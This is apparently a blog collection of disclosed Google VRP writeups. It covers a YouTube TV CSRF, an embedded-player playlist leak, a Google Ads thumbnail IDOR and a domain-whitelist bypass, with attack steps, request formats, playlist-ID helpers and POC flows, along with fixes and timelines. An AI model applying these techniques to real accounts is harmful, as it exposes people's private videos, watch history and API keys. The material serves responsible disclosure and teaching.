To exploit this, we don’t have to use the actual YouTube TV site, it’s enough to extract the essentials from it, and build a little script that behaves like a “barebones TV”. So that it can generate a lounge_token for itself, and poll the /bind endpoint for new play events.

If you are waiting for the “pin pairing” steps, we can actually skip those completely by just using the lounge_token returned to the TV from the initial /pairing/get_lounge_token_batch request.

But we are hitting the exact same wall that we hit in both of my previous writeups! How do we know the victim’s private video IDs? In the beginning, I told you that this bug has a solution for this problem. And indeed it does!

The magic here is that we can not only play videos, but we can even play playlists on the TV using this vulnerable request!

By changing the videoId to listID in the POST request, we can specify a playlist to play on the TV, rather than a video:

An image showing the CSRF vulnerable "bind" HTTP request, but now specifying a playlist to play, instead of a video

When specifying a playlist like this in the POST request, the TV will get a play event from the Lounge API with a list of the video IDs that the given playlist contains.

But what playlist should we play in the name of the victim?

In my previous YouTube writeup, I talked about the special Uploads playlist. It’s special because if the channel owner views that playlist, she can see all of her Public, Unlisted and Private videos in it. But if a different user views the same playlist, she can only see the Public videos in it.

The ID of this special Uploads playlist for a given channel ID can be found easily:

// just have to change the second char of the channel ID
// from 'C' -> 'U' to get the ID of the special "Uploads" playlist

"UCBvX9uEO0a3fZNCK12MAgug" -> "UUBvX9uEO0a3fZNCK12MAgug"

The channel ID is public for every YouTube channel, most of the time it can be found by simply navigating to the channel’s page on YouTube, and checking the URL:

https://www.youtube.com/channel/[channel_id]
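The transformation above is mechanical enough to put in a tiny helper:

```python
def uploads_playlist_id(channel_id):
    # Flip the second character 'C' -> 'U':
    # "UC..." (channel ID) becomes "UU..." (its special Uploads playlist).
    assert channel_id.startswith("UC")
    return "UU" + channel_id[2:]

print(uploads_playlist_id("UCBvX9uEO0a3fZNCK12MAgug"))  # -> UUBvX9uEO0a3fZNCK12MAgug
```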

So, if using our CSRF vulnerable POST request, we play the victim’s special Uploads playlist in the name of the victim on our malicious TV, our malicious TV will get all of the victim’s Public, Unlisted and Private video IDs!

And we already know how we can steal the ctt for a private video if we know its ID.

So, to sum it all up, we could make an absolutely ridiculously epic POC which steals literally everything from the victim, by performing these simple steps:

  1. Set up a malicious page specifically for the victim by hardcoding her channel ID, and make the victim open it in her browser
  2. With our malicious page, make the victim play her Uploads playlist on our evil TV
  3. With our evil TV, listen for the play event and note the victim’s video IDs (including Unlisted & Private video IDs)
  4. With our evil TV, tell our malicious page to play all of the Private video IDs one by one on our TV, so we can steal all of the ctts from the play events our TV gets
  5. Profit!!!

Here is a diagram of this high-level attack flow:

A diagram explaining the above mentioned attack flow visually

That’s it! We have stolen all Unlisted and all Private videos of the victim! Now we’re talking!

(actually, we could also steal the contents of private playlists, liked videos, and the watch later playlist with the same trick. but that’s not that exciting.)

This bug was a bit complicated to exploit, so I made an extremely overengineered POC script, which performs this attack automatically. This is how it looked in action, stealing all Private & Unlisted videos of a victim:

The POC had two components, a backend webserver which also acted as the evil TV, and a frontend which was running in the victim’s browser, talking with the backend. It’s perfectly fine if you don’t exactly understand how the script worked under the hood, I might have made a little bit of a mess (but you are welcome to look at all of the source code if you are interested!). Here is a more (or less) fun, higher-level description of the POC flow (that I have sent to Google):

  1. POC starts a Flask webserver to serve the victim opening the malicious page. Let’s call the POC Python script backend.
  2. The victim opens the malicious webpage. Let’s call the victim’s page frontend.
  3. The backend requests the attacker to enter the victim’s channel ID.
  4. The channel ID’s second character is changed to a U. The resulting string is the ID of the victim’s Uploads playlist, which contains all Private and Unlisted uploads. Only the owner can see the Private and Unlisted videos in this playlist. Other users only see the Public video IDs.
  5. The POC sets up a fake TV and starts to poll the events for it.
  6. The frontend is instructed to execute the CSRF request and play the playlist generated in Step 4. on the malicious TV.
  7. When the CSRF request is sent by the frontend, the backend receives the TV play event, containing the IDs of all of the victim’s videos, including Private and Unlisted video IDs.
  8. The backend queries the YouTube Data API with all of the obtained video IDs to find out which videos are Private or Unlisted.
  9. The Unlisted videos are ready; the backend prints their IDs out for the attacker. The Unlisted videos only require knowing the video ID to watch.
  10. The backend instructs the frontend to play the victim’s Private videos on the malicious TV one by one. For every video, the backend sets up a new malicious TV, tells the frontend to play the specific video, listens for play events, and receives the event for the TV with a special ctt parameter. Using the ctt, the backend queries the get_video_info YouTube endpoint for the specific Private video, authenticates itself with the ctt, and greps the Private video’s title and direct video URL from the response.
  11. After every Private video is played by the frontend, the backend prints the details of all of the obtained Private videos for the attacker.
  12. The POC script is done.

Once again, you can find the source code of the POC files here.

The fix:

YouTube fixed this issue in a quite simple, but effective way. They removed the whole feature. :D

No, actually, what they did is that this /bind endpoint now requires an Authorization header with an OAuth Bearer token to be authenticated, so the mobile apps and such can still use it without issues. But when requested with cookies only (like in our CSRF attack), it behaves like an anonymous request, without any authentication. Thus, it’s not possible to play videos/playlists in the name of a victim anymore.

Hey, you read the whole thing!
I made an experimental Google Form to get a little feedback about you & your experience reading this writeup. If you’d like, you can fill it out here.

Timeline:

[Jul 24, 2020] - Bug reported
[Jul 24, 2020] - Initial triage (P3/S4)
[Jul 29, 2020] - Bug accepted (P1/S1)
[Aug 04, 2020] - Reward of $6000 issued
[??? ??, 2020] - Bug fixed

The Embedded YouTube Player Told Me What You Were Watching (and more)

18 January 2021 at 11:00

2019, October 11, 00:16:
I finish the cold frozen pizza that I made hours before but forgot to eat, finally write the report, press submit on the Google security bug submission form, and see the classic, Thanks! We received your report. message. That feeling is hard to beat.

I just submitted a bug, using which, I could simply send a link to someone, and when they click on it and visit my website, I could steal their YouTube watch history, the links to watch all of their unlisted videos, their Watch Later playlist, the list of videos they’ve liked, and more. It was pretty damn cool.

How was this possible? Let’s go back in time a little bit.

Already made some progress? Skip ahead to Chapter 2, Chapter 3, or Chapter 4!

Chapter 1:
Your special playlists you never created

This issue requires a little bit of understanding of the inner workings of YouTube. Most importantly, of these four interesting playlists:

Since YouTube is made up of videos, a bunch of internal stuff in YouTube is made up of playlists. Everybody has a few of them, even if they have never created one. I knew about these from previous research I have done (by previous research, I just mean trying every feature and trying to understand how they work), before finding this bug. Let’s look at these playlists one-by-one because they will be important later.

The Watch History playlist:

At the time of finding this bug, every YouTube user had a playlist with the ID HL, which stands for “History List” (I assume). This list contained every video you previously watched on YouTube.

The Watch Later playlist:

You have probably seen the little clock icon everywhere on YouTube, which when pressed, adds the video to your “Watch Later”. This is also just a special playlist internally, with the ID WL.

The Liked Videos playlist:

This is a tricky one. At the time of finding the bug, I was a bit confused about how this works, so I had to do a little bit of guessing. All I knew was that it was constructed by somehow modifying your channel ID, which is a 24-char-long string and can be found by going to your channel page and looking at the URL:

"https://www.youtube.com/channel/UCBvX9uEO0a3fZNCK12MAgug"
-> channel_id = "UCBvX9uEO0a3fZNCK12MAgug"

After a bit of trial and error, and by looking at the playlists of my testing/personal accounts, I figured out a way to “guess” the special “Liked Videos” playlist. You just had to replace the first 3 characters of the channel ID with LLD or LLB:

// one of them will be the "Liked Videos" playlist of the given channel
UCBvX9uEO0a3fZNCK12MAgug -> LLDvX9uEO0a3fZNCK12MAgug
UCBvX9uEO0a3fZNCK12MAgug -> LLBvX9uEO0a3fZNCK12MAgug

And finally, the most important, the Uploads playlist:

This special playlist contains all of your videos. It has everything in it, regardless of the video’s privacy setting. So all Public, Unlisted and Private videos you have ever uploaded, are in your special “Uploads” playlist.

At the time of finding the bug, the same guessing trick had to be used as for the “Liked Videos” playlist, but this time the first 3 characters of the channel ID had to be UUD or UUB:

// one of them will be the "Uploads" playlist of the given channel
UCBvX9uEO0a3fZNCK12MAgug -> UUDvX9uEO0a3fZNCK12MAgug
UCBvX9uEO0a3fZNCK12MAgug -> UUBvX9uEO0a3fZNCK12MAgug
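The guessing trick for both special playlists can be captured in one small helper (this just mirrors the examples above; nothing else is assumed):

```python
def playlist_candidates(channel_id, prefix):
    # 2019-era guessing trick: replace the first three characters of the
    # channel ID with e.g. "LLD"/"LLB" (Liked Videos) or "UUD"/"UUB"
    # (Uploads); one of the two candidates is the real special playlist.
    return [prefix + "D" + channel_id[3:], prefix + "B" + channel_id[3:]]

cid = "UCBvX9uEO0a3fZNCK12MAgug"
print(playlist_candidates(cid, "LL"))  # "Liked Videos" candidates
print(playlist_candidates(cid, "UU"))  # "Uploads" candidates
```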

Or, if you don’t want to do any of that, you can just go to the channel’s page, click the Videos tab, and click Play All. But only if that button is visible, which is unfortunately not always the case.

If you are interested in the details about how these playlists have changed since 2019, and how they work today at the time of writing this post, you can check out this Gist I made.

So now you know about these special playlists every YouTube user has. Now, you might think that we should just open for example someone’s “Uploads” playlist like you would open any other playlist, and simply leak all of their unlisted videos:

// how to steal someone's unlisted videos (very easy!!)

1. Open https://www.youtube.com/playlist?list=[victims-uploads-playlist]
2. Profit!?

Unfortunately, it’s not that easy. These playlists are special in another way too: different users will see different videos in them. If the channel owner opens her “Uploads” playlist, she will see all of her videos, regardless of the privacy setting. If an attacker tries to open the victim’s “Uploads” playlist, only the Public videos will be shown; any Unlisted and Private videos the victim has will just not be there.

As an attacker, we can clearly see that these playlists can contain very sensitive information about the users. We would like to steal these. But unfortunately, they seem to be well protected…

Chapter 2:
The Embedded Player and its API

If you have a website and want to have a little YouTube player inside it, there is an app for that. And it’s called the YouTube IFrame Player. Embedding this player into your website is quite easy, you just have to copy some HTML code with an iframe tag, and paste it into your site’s source:

Screenshot of an empty webpage with an embedded YouTube player

But today websites are rarely that simple, so you might wonder: what if I want to dynamically create a YouTube player with JavaScript? What if I want to automatically pause the video? Doing these would seem quite hacky, or even impossible in some cases, due to the rules of the Same-origin Policy and other protections modern browsers provide.

Thankfully, YouTube has a solution for this as well, the YouTube Player API. This API allows you to just add a JS library to your site, and then simply create/modify/control the YouTube players on your site however you’d like, using JavaScript. For example, if you want to pause a video, you can just call player.pauseVideo().

Hm.. This is pretty interesting, but how does it work? The answer might be obvious if you have previously worked with cross-origin (iframe) communication. The YouTube player uses the browser’s PostMessage API, which allows different origins (in our case your site and the YouTube iframe), to send each other little messages over a secure channel. So the YouTube player has a postMessage listener where it listens to commands, and the JS library you put into your site sends messages to it when you want to perform some action, like pausing the video. Actually, the YouTube player is talking a lot, even if you don’t ask it anything. It immediately tells the JS library on your site if anything happens with the player. This makes it possible for your site to add event listeners, which get called when for example the user skips into a currently playing video.

Let’s see a quick example of how this communication works under the hood:

// this postMessage is sent from your site to the iframe under the hood when you call “player.playVideo()”
-> {"event":"command","func":"playVideo","args":[],"id":1,"channel":"widget"}

// the iframe sends a lot of stuff back, here are some examples
<- {"event":"infoDelivery","info":{"playerState":-1,"currentTime":0,"duration":1344,"videoData":{"video_id":"M7lc1UVf-VE","author":"","title":"YouTube Developers Live: Embedded Web Player Customization"},"videoStartBytes":0,"videoBytesTotal":1,"videoLoadedFraction":0,"playbackQuality":"unknown","availableQualityLevels":[],"currentTimeLastUpdated_":1610191891.79,"playbackRate":1,"mediaReferenceTime":0,"videoUrl":"https://www.youtube.com/watch?v=M7lc1UVf-VE","playlist":null,"playlistIndex":-1},"id":1,"channel":"widget"}
<- {"event":"onStateChange","info":-1,"id":1,"channel":"widget"}

Just a reminder, I was often confused about this, but the “under-the-hood” commands I just showed an example of are sent by your site. By “under-the-hood”, I just mean that developers usually include YouTube’s library, to make communication easier, and that library simply abstracts the details away, so you can just call pauseVideo(), without worrying about anything else. But of course, if you would want, you could manually send these postMessages to the player, via plain old vanilla JavaScript, and it would work in the exact same way as using the fancy JS library. So just think of it as an abstraction layer, which you have full control of.

If you want to see what postMessages a page receives, you could just add an event listener to the page which prints every message to the console:

// listen for all “message” events and log them to the console:
> window.addEventListener("message", function(event){console.log(event.data)})

Okay, so we can play and pause the player with JavaScript. That’s nothing crazy, but it’s cool. Is there anything else we can do? Yes, there is. Actually, if you read the documentation, there is a bunch of stuff we can do using this Player API. Let’s see some of them that might look interesting to us:

The player.getPlaylist() function:

If you want to embed a playlist into your site, you can use the player.loadPlaylist(playlist_id) method of the library to load a playlist into an existing embedded player. After this, you could call playVideo(), and start playing the first video, after which, the next one from the playlist will automatically start playing, and so on. So we have playlist support.

Now, what if you want to embed a playlist into your site, but want to know what videos are in it? There is a function for that as well. Calling player.getPlaylist(), on a player that has a playlist currently loaded, will return an array of the video IDs in the playlist as they are currently ordered:

> player.getPlaylist()

Array(20) [ "KxgcVAuem8g", "U_OirTVxiFE", "rbez_1MEhdQ", "VpC9qeKUJ00",
            "LnDjm9jhkoc", "BQIOEdkivao", "layKyzA1ABc", "-Y9gdQnt7zs",
            "U_OX5vQ567Y", "ghOqpVet1uQ", … ]

Good to know..

The not-really deprecated player.getVideoData() function:

If you look at the raw postMessage communication, often you can see an object named videoData being sent by the iframe to the page. This object contains a bunch of stuff about the currently playing video, including its title.

> player.getVideoData()

Object { video_id: "KxgcVAuem8g", author: "LiveOverflow2",
        title: "Astable 555 timer - Clock Module", video_quality: "medium",
        video_quality_features: [], list: "PLGPckJAmiZCTyI72iI2KaJxkp-vUKBlTi" }

This function is not listed in the official YouTube documentation, supposedly it got removed a few years ago, but as a fellow Stack Overflow member pointed out:

Comment on StackOverflow saying that the function still works in 2017

(Even if the getVideoData() function were fully removed from the library, as I said before, as long as the iframe sends that object to your page, you could access it.)

Again, interesting, let’s just note that we can do this as well..

One last thing about the embedded player:

If you are logged in to YouTube, the embedded player is also “logged in”. Videos you watch in the player will get added to your Watch History. There is a little clock icon in the player that you can use to add the video to your account’s Watch Later. So, we could say that if you are logged in to YouTube, the player is also logged in, and it has “full access” to your account, just like the main YouTube site has.

Chapter 3:
Connecting things together

I really like this bug because of how it didn’t need any fancy “hacking techniques”. Actually, I wasn’t even at a computer when I found it, so to speak…

You might already put the two things together, and also found the bug, just by reading the first two chapters of this writeup.

At the time, I was looking at YouTube for a while already, testing the playlists separately, and later, testing the embedded player. I wasn’t able to find any bugs. Then, one day, I remember, I was standing on a tram, probably on my way to school, (probably late, as always :( ), and I had this idea:

“Wait a second. Only the owner can see her playlist’s contents. I have the tools to play any playlist in the name of the owner (since the embedded player is also “logged in” to YouTube), and I also have the tools to get the videos from the currently playing playlist. What? Is it this easy?”

Turns out it was that easy. Later, at home, I made a page where I embedded a YouTube player and instructed it to play the playlist HL (the one with your Watch History), and once it loaded, I called player.getPlaylist(), and I think I just printed the result to the console.

I opened the page with my test account and saw the test account’s watch history get printed to the console.

Boom! We have a bug! You visit my page, I steal your Watch History! Not bad.

So we can embed the Watch History playlist. Why not embed other things?

I got to work to make a pretty epic POC, which demonstrated everything an attacker could do using this bug. Here are all of the exploits I was able to pull off using this issue, other than stealing your Watch History:

Stealing your Watch Later:

Similarly to the HL playlist, we could just embed the WL playlist, and steal the contents of the victim’s Watch Later using player.getPlaylist().

Stealing the videos you have liked:

These next exploits will require a targeted attack since the IDs we will be requesting will be based on the victim’s channel ID. Stealing the HL and the WL playlist does not require any victim-specific setup, since everyone has those same IDs.

I have previously explained how to get the playlist ID of the “Liked Videos” playlist. If I knew the victim’s channel ID, I could set up a page that loads both of the victim’s possible playlist IDs and tries to list them using player.getPlaylist(). One of the tries would succeed, and I would have a list of all of the videos the victim has previously liked.
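As a quick illustration of the ID derivation described above, here is a small helper. This is my own sketch, not code from the report; it assumes the commonly known YouTube convention that channel IDs start with UC, and that the “Liked videos” and “Uploads” playlists reuse the same suffix with LL and UU prefixes respectively.

```python
# Hypothetical helper: derive special playlist IDs from a channel ID.
# Assumes the common YouTube convention that channel IDs start with "UC"
# and that the "Liked videos" / "Uploads" playlists reuse the same suffix
# with an "LL" / "UU" prefix.

def special_playlist_ids(channel_id):
    if not channel_id.startswith("UC"):
        raise ValueError("expected a channel ID starting with 'UC'")
    suffix = channel_id[2:]
    return {
        "liked": "LL" + suffix,    # "Liked videos" playlist
        "uploads": "UU" + suffix,  # "Uploads" playlist
    }

ids = special_playlist_ids("UCexampleChannelId0000")
print(ids["liked"])    # LLexampleChannelId0000
print(ids["uploads"])  # UUexampleChannelId0000
```

An attacker page would then try each derived ID with the embedded player and keep whichever one loads.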

Stealing any private playlist you might have:

Since we are playing these playlists “in the name of the victim”, if the victim has any custom-made private playlists, and we somehow already know its ID (this would be pretty hard, so the impact of this is quite low), we could just embed it, and as before, just use getPlaylist() to steal the contents.

Stealing the title & some other info about a private video:

For this, again, we would have to know the ID of the victim’s private video we want to target, which would be pretty hard and would probably require a different bug.

But if we know the ID of one of the victim’s private videos, we could embed that private video on the malicious site, and use player.getVideoData() to steal its title and some other extra information about it, like the list of available caption languages.

The best for the last, stealing all of your Unlisted videos:

I like this the most since a lot of people use unlisted videos to share personal/not-public videos with only specific people. I do this too: all of the POC videos I send to Google are unlisted videos, and I would consider them pretty sensitive.

So I have previously explained how to get the ID of the “Uploads” playlist for a given channel, and as you might already expect, we could simply embed that playlist into our malicious site.

At the time of finding this bug, embedding the “Uploads” playlist as an owner worked a little bit differently than I expected. I previously said that the owner can see all of the videos in this playlist, regardless of the privacy settings. This is still almost the case, but when an “Uploads” playlist was embedded, the owner only saw the Public and the Unlisted videos in it; the Private videos were omitted. This is perfectly fine for the current attack, but it was a limitation that didn’t allow us to leak all of the Private video IDs and steal all of the private titles (using the previous attack), or to steal the private videos altogether using the bug from my previous writeup.

Anyways, we had the ID of the “Uploads” playlist; we could embed it into our site, and then use the player.getPlaylist() function to list all of the video IDs inside.

If a video is Unlisted, the only thing which keeps it secret is its video ID. Now, because we stole all of the unlisted video IDs, we could watch all of the victim’s unlisted videos!
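To make the last step concrete: once getPlaylist() has returned the unlisted IDs, turning them into watchable links is trivial, because the ID is the only secret. A minimal sketch (the example IDs are placeholders, not real leaked data):

```python
# Hypothetical post-processing of IDs leaked via player.getPlaylist():
# an unlisted video is protected only by the secrecy of its ID, so a
# list of IDs is effectively a list of watchable videos.

def watch_urls(video_ids):
    return ["https://www.youtube.com/watch?v=" + vid for vid in video_ids]

leaked = ["dQw4w9WgXcQ", "abc123DEF45"]  # placeholder IDs
for url in watch_urls(leaked):
    print(url)
```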

Here is the POC I sent to Google. At the time, I unfortunately did not make a POC video, and since the issue is now fixed, I made some screenshots to show you what it looked like.

Opening the POC HTML automatically embedded 2 playlists, HL and WL, and displayed the contents as two lists under the players:

Screenshot of the first part of the POC

Scrolling down a bit, you can see the “targeted attacks” section. After entering your channel ID, it listed your “Liked videos” and your “Uploaded videos”, including your unlisted videos. Under that, you could enter a private video ID you had access to, and it displayed the video’s title and listed the available caption languages:

Screenshot of the second part of the POC

Chapter 4:
How it all ends

2019, October 11, 01:15:
My part is done, I go to sleep. But not before refreshing my email one last time, hoping that I might have already got a response. The chances of that are almost zero, but the excitement makes me do this every time I send in a bug.

After two weeks, and a bit of misunderstanding, the bug gets triaged with “At first glance, this might not be severe enough to qualify for a reward”. This hits me quite hard since, back then, all of my previous bugs got this same triage message, and after finding this one, I got really excited and was pretty sure I would get the mighty “Nice catch! I’ve filed a bug based on your report.” for the first time. But I didn’t. I was tweeting quite frequently at the time, so I let out my frustration a little bit:

My slightly-salty tweet about the email I have got

I was feeling a little down, since I had been hacking on Google VRP for two months already, and all of my bugs got the “might not be severe enough” message. But most of them were still waiting for the VRP Panel’s decision about the reward, so not all hope was lost. Yet.

Almost a month later, I get a new email from buganizer-system@google.com. As a Google VRP bug hunter, these are the emails you are looking for. I open it, and I see that this bug got rewarded with a bounty of $1,337. This was my first “leet” reward. I tweeted a gif of a dancing parrot. I like to use that gif for such occasions:

My tweet of a dancing parrot

At the time I also found it a bit weird, and looking back at it, I still think that the impact of this bug was higher than the issued reward. Just thinking about my personal use case: stealing all of someone’s POC videos of potentially unfixed Google bugs (since I upload them to YouTube as Unlisted videos) feels pretty high-impact to me. Not even talking about the Watch History.

I did not get back to Google about my feelings regarding the impact, so it is possible that if I tell them the reasons why I think it deserves a bigger bounty, they might re-consider the reward decision. If you are in a similar situation, don’t be afraid to ask.

The fix:

16 days after getting the reward email, I get a new email, saying that the issue is fixed. I check out what they did.

When the embedded player loads a playlist, it gets the contents using the /list_ajax?list=[playlist-id] endpoint. Now, if you give any private/special playlist to this endpoint, it will return an error. Because of this, embedding any of the previously mentioned playlists will just fail, and the player will display an error.

This seemed to be implemented correctly, but one issue was still working: the leaking of the videoData object on a private video, which included the title and some other information. I ping the bug, saying that this issue still works. For some reason, I do not receive a reply. I ping Google once again, and I get a reply saying that they will let the product team know.

I got back to this bug now, in 2021, and I wanted to re-test the fixes before starting to work on a writeup. Turns out, they also fixed the videoData leak now. If a video is private, you can still embed it, but the videoData that the player sends to your site will just be an empty object.

Conclusion:

What I like about this bug is that it proves what I always say when someone asks me how I hunt for bugs, or how they should hunt for bugs. I even said it in my previous writeup:

“In my opinion, the more you understand a system, the more ideas about how to break it will just naturally come to mind.”

Thank you for reading!

Timeline:

[Oct 11, 2019] - Bug reported
[Oct 11, 2019] - Initial triage
[Oct 24, 2019] - Bug accepted (P4 -> P2)
[Nov 14, 2019] - Reward of $1337 issued
[Nov 30, 2019] - First part of the bug mitigated
[??? ??, 2020] - Second part of the bug mitigated, issue is fully fixed

Stealing Your Private YouTube Videos, One Frame at a Time

11 January 2021 at 11:00

Back in December 2019, a few months after I started hacking on Google VRP, I was looking at YouTube. I wanted to find a way to get access to a Private video which I did not own.

When you upload a video to YouTube, you can choose between 3 privacy settings: Public, which means that anyone can find and watch your video; Unlisted, which only allows users who know the video ID (the URL) to watch the video; and Private, where only you, and accounts you’ve explicitly given permission to, can watch the video.

The first thing I did was upload a video to my second testing account’s YouTube channel and set the video’s privacy to Private, so I could use that video for testing. (Remember: always only test against resources/accounts you own!) If I could find a way to access that video with my first testing account, we’d have a bug.

With my first account, I started using YouTube, trying every feature, pressing every button I could find, and whenever I saw an HTTP request with a video ID in it, I changed it to the target Private video’s ID, hoping to leak some information about it, but I wasn’t having any success. The main YouTube site (at least the endpoints I tested) seemed to always check whether the video was Private, and when I requested info about the target Private video, the endpoints always returned errors such as This video is private!.

I needed to find another way.

A great thing to do in a situation like this is to look for other products/services which are not your main target, but which interact with its resources internally. If they have access to those resources, they might not have every level of protection that the main product has.

An interesting target which matched these requirements was Google Ads. This is the product which advertisers use to create ads across all Google services, including YouTube. So, the ads you get before YouTube videos are set up by advertisers here, on the Google Ads platform.

So I created a Google Ads account and created a new advertisement, which would play a video of mine as a skippable ad for YouTube users. During the ad creation process, I also tried to use the target Private video’s ID wherever I could, but with no success.

After creating the ad, I started looking at all of the different Google Ads features. The thing was huge, it had a bunch of different settings/tools. I was trying to find anything that could be YouTube-related.

There was a page called Videos, where I could see a list of videos used by my advertisements. Clicking on a video opened up an Analytics section for that specific video. It had an embedded player, some statistics, and an interesting feature called Moments. It allowed advertisers to “mark” specific moments of the video, to see when different things happen (such as the timestamp of when the company logo appears). To be honest, I am not quite sure what advertisers use this feature for; nevertheless, it seemed interesting:

The Moments feature on the Ads console

Looking at the proxy logs, every time I “marked a moment”, a POST request was made to a /GetThumbnails endpoint, with a body which included a video ID:

POST /aw_video/_/rpc/VideoMomentService/GetThumbnails HTTP/1.1
Host: ads.google.com
User-Agent: Internet-Explorer-6
Cookie: [redacted]

__ar={"1":"kCTeqs1F4ME","2":"12240","3":"387719230"}

Where in the __ar parameter, 1 was the ID of the video and 2 was the time of the moment in milliseconds. The response was a base64 encoded image, which was the thumbnail displayed by Ads.
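A sketch of what building and decoding such a request could look like. The field numbers (“1” = video ID, “2” = time in milliseconds) come from the captured request above; the meaning of the third field is an assumption (it was simply present in the capture), and the endpoint behaviour has of course long since been fixed:

```python
import base64
import json

# Build the __ar body observed in the /GetThumbnails request.
# "1" is the video ID, "2" is the moment's timestamp in milliseconds.
# The third field appeared in the captured request; its meaning is an
# assumption (likely account-related), so it is just passed through.
def build_ar(video_id, time_ms, third_field="387719230"):
    return json.dumps(
        {"1": video_id, "2": str(time_ms), "3": third_field},
        separators=(",", ":"),
    )

# The endpoint answered with a base64-encoded image; recovering the
# raw image bytes is a plain base64 decode.
def decode_thumbnail(b64_response):
    return base64.b64decode(b64_response)

print(build_ar("kCTeqs1F4ME", 12240))
# {"1":"kCTeqs1F4ME","2":"12240","3":"387719230"}
```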

I did what I did a bunch of times already, and replaced the ID to my second account’s Private video in the request, and to my surprise, it returned a base64 response!

I quickly Googled “base64 to image”, pasted the base64 into the first decoder I found, and it displayed a thumbnail from the target Private video! It worked! I had found a working IDOR (Insecure Direct Object Reference) bug, where I could get a frame from any Private video on YouTube!

But I was like “hm, that is just one frame”. We can do better.

I wanted to make a proof of concept Python script which generates an actual, moving “video”. I searched for some calculations and figured out that at 30 FPS, one frame stays on the screen for about 33 milliseconds (1000 / 30 ≈ 33). So I just had to download an image starting from 0 milliseconds, incrementing by 33 milliseconds every time, and then construct some kind of video using all of the images I acquired.
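The timing arithmetic can be sketched like this (my own reconstruction, not the original POC script):

```python
# Generate the millisecond timestamps to request, one per frame.
# At roughly 30 FPS a frame lasts about 1000 / 30 ≈ 33 ms, so stepping
# the requested time by 33 ms walks through the video frame by frame.
def frame_timestamps(duration_ms, frame_ms=33):
    return list(range(0, duration_ms, frame_ms))

# First 3 seconds of video -> one /GetThumbnails request per timestamp.
stamps = frame_timestamps(3000)
print(len(stamps))   # 91
print(stamps[:4])    # [0, 33, 66, 99]
```

Each timestamp would then be sent to the thumbnail endpoint, and the decoded images stitched into a GIF.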

I wrote a quick and dirty POC which downloaded the frames for the first 3 seconds of a video, decoded them, and then generated a GIF. To test it, I ran it against an old video of mine, which I had previously made private due to, of course, the high level of cringe:

And there you have it, using this bug, any private YouTube video could have been downloaded by a malicious attacker, which to me feels like a pretty cool impact. But of course, it had a few limitations I couldn’t overcome:

  • In the real world you would have to know the ID of the target video. Mass-leaking those would be considered a bug on its own.
  • Since these are just images, you can’t access audio.
  • The resolution is very low. (but it’s high enough to see what is happening)

The takeaway from this bug is that situations where two different products interact with each other under the hood are always a good area to focus on, since both product teams probably only know their own systems best, and might miss important details when working with a different product’s resources.

Looking for an IDOR like this can be a very repetitive and manual task, and nowadays I try to avoid just blindly changing IDs everywhere and hoping for the best. After you test a product for a while and get a feel of how it works internally, it might be more effective (and more fun) to try to think about different unexpected actions that the developers maybe didn’t think about based on what you saw already, or focus on features that just got released, or to just do any other non-mindless task. You will probably enjoy it more in the long term. In my opinion, the more you understand a system, the more ideas about how to break it will just naturally come to mind.

But again, even in the most robust and well tested systems, there is the chance that just swapping an ID in a request will get you a critical bug.

Thank you for reading! See you next Monday ;)

Timeline:

[Dec 11, 2019] - Bug reported
[Dec 12, 2019] - Initial triage
[Dec 20, 2019] - Bug accepted (P4 -> P1)
[Jan 08, 2020] - Bug mitigated by temporarily disabling the Moments feature
[Jan 17, 2020] - Reward of $5000 issued
[??? ??, 2020] - Moments re-enabled, now it checks if you have access to the video

The unexpected Google wide domain check bypass

8 March 2020 at 11:00

Hi! Welcome to my first ever writeup! Let me tell you this “funny” story of me trying to bypass a domain check in a little webapp, and accidentally bypassing a URL parser that is used in (almost) every Google product.

It all started with me sitting at a ‘chill-area’ at 36C3 in December 2019. I was in the middle of finding a venue for a bug bounty meetup we were trying to organise. After failing horribly, I decided to just sit down and try to hunt for some bugs. I started looking at API documentations to find some new interesting feature to exploit. I was browsing the GMail API Docs and came across a button which generated a GMail API key for you if you pressed it:

The Henhouse App

This looked interesting, since it seemed like you could perform Google Cloud Console actions just by making a victim click on a link. I started investigating.

I found out that this app that pops up is called henhouse. The GMail API documentation embeds the henhouse app as an iframe. This is the URL that gets loaded in the iframe:

https://console.developers.google.com/henhouse/?pb=["hh-0","gmail",null,[],"https://developers.google.com",null,[],null,"Create API key",0,null,[],false,false,null,null,null,null,false,null,false,false,null,null,null,null,null,"Quickstart",true,"Quickstart",null,null,false]

As you can see, the pb[4] in the URL is https://developers.google.com, so the URL of the embedding domain.

The fact that henhouse is embedded hints that there is some kind of communication between the parent page and the child iframe. This must be the case, since, for example, you can click the Done button to close the henhouse window and go back to the documentation. After a bit of testing, I confirmed that the henhouse app sends postMessages to the parent domain (more accurately, to the domain specified in pb[4]). I also found out that if an API key / OAuth Client ID is generated, it is also sent back to the parent in a postMessage.

At this point I had imagined the whole attack scenario: I embed henhouse on my own malicious site and just listen for the victim’s API key to arrive in a postMessage. So I did what I had to do, and put my own domain into the pb object.

The Whitelist Fail

Hmm.. This is not that easy.

To this day I’m not sure why, but I did not give up, and started reverse-engineering the JavaScript to figure out how this “whitelist” works. I think this is something we all often do: when our attempts fail, we just think ‘Okay, of course they thought about this. This is protected. Let’s just search for a different bug.’ Well, for some reason, this time, I did not do this.

So after a few hours of untangling obfuscated JavaScript, I got an understanding of how the whitelist works. I made a pseudocode version for you:

// This is not real code..

var whitelistedWildcards = ['.corp.google.com', '.c.googlers.com'];
var whitelistedDomains = ['https://devsite.googleplex.com', 'https://developers.google.com',
                          'https://cloud-dot-devsite.googleplex.com', 'https://cloud.google.com',
                          'https://console.cloud.google.com', 'https://console.developers.google.com'];

var domainURL = URL.params.pb[4];
if (whitelistedDomains.includes(domainURL) || getAuthorityFromMagicRegex(domainURL).endsWith(whitelistedWildcards)) {
  postMessage("API KEY: " + apikey, domainURL);
}

Bypassing the whitelistedDomains looked impossible, but for some reason I wanted to dig deeper into the whitelistedWildcards. So it checks if the parsed authority (domain) of the URL ends with .corp.google.com or with .c.googlers.com.

Let’s see what the getAuthorityFromMagicRegex function looks like:

var getAuthorityFromMagicRegex = function(domainURL) {
  var magicRegex = /^(?:([^:/?#.]+):)?(?:\/\/(?:([^/?#]*)@)?([^/#?]*?)(?::([0-9]+))?(?=[/#?]|$))?([^?#]+)?(?:\?([^#]*))?(?:#([\s\S]*))?$/;
  return domainURL.match(magicRegex)[3];
};

Oof... That is an ugly regex... What is in domainURL.match(magicRegex)[3]? Let’s see what this regex returns if we try it on a full-featured URL in the JS Console:

"https://user:pass@test.corp.google.com:8080/path/to/something?param=value#hash".match(magicRegex);

Array(8) [ "https://user:pass@test.corp.google.com:8080/path/to/something?param=value#hash",
